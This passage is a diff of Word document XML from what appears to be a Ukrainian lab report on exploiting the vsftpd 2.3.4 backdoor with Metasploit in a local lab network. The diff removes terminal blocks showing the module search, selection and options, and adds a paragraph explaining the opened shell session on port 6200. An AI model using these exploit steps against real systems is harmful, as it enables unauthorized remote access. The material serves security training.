-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.        </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   :OOOOOOOOOOOOOOOk.   .kOOOOOOOOOOOOOOO:       </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  'OOOOOOOOOkkkkkOOOO: :OOOO kkkkOOOOOOOOOOO'    </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  oOOOOOOOO.    .oOOOOoOOOOo.    .OOOOOOOOOOo    </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  fOOOOOOOO.      .cOOOOOOc.      .OOOOOOOOOf    </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  ;OOOOOOOO           ;OO;           OOOOOOOO;    </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  .OOOOOOOO  .OOOOOOO. OO .OOOOOOO.  OOOOOOOO.   </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   cOOOOOOO .OOOOOOOOO OO OOOOOOOOo. OOOOOOOc    </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    oOOOOOO .OOOOOOOOo OO OOOOOOOOo  OOOOOOo     </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">     'cOOOO .OOOOOOOOO OO OOOOOOOOO. OOOOc'       </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">       :kOOOOOOOOOOOOOOOOOOOOOOOOOkOOk:          </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">         'xOOOOOOOOOOOOOOOOOOOOOOOOx'            </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">           ':dOOOOOOOOOOOOOOOOOd:'                </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">               ':okxdolllodxko:'                  </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="1A1A1A"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ключовий рядок 2: '[*] Command shell session 1 opened (192.168.56.1:46832 -&gt; 192.168.56.101:6200)' — підтвердження встановлення shell-з’єднання. Metasploit підключився до backdoor-порту 6200 на цільовій системі.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="FAFCFF"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">       =[ metasploit v6.3.44-dev                          ]</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  + -- =[ 2376 exploits - 1232 auxiliary - 413 post       ]</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  + -- =[ 1388 payloads - 46 encoders - 11 nops           ]</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  + -- =[ 9 evasion                                       ]</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msf6 &gt; search vsftpd</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Matching Modules</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">================</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   #  Name                                  Disclosure Date  Rank       Check  Description</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   -  ----                                  ---------------  ----       -----  -----------</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">[*] No payload configured, defaulting to cmd/unix/interact</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="8"/>
-          <w:szCs w:val="8"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="60" w:before="100"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">show options — ДО налаштування RHOSTS:</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; show options</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Module options (exploit/unix/ftp/vsftpd_234_backdoor):</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   Name    Current Setting  Required  Description</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   ----    ---------------  --------  -----------</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   RHOSTS                   yes       The target host(s), range CIDR identifier</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   RPORT   21               yes       The target port (TCP)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Exploit target:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   Id  Name</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   --  ----</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   0   Automatic</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="8"/>
-          <w:szCs w:val="8"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="60" w:before="100"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Налаштування RHOSTS та show options — ПІСЛЯ:</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
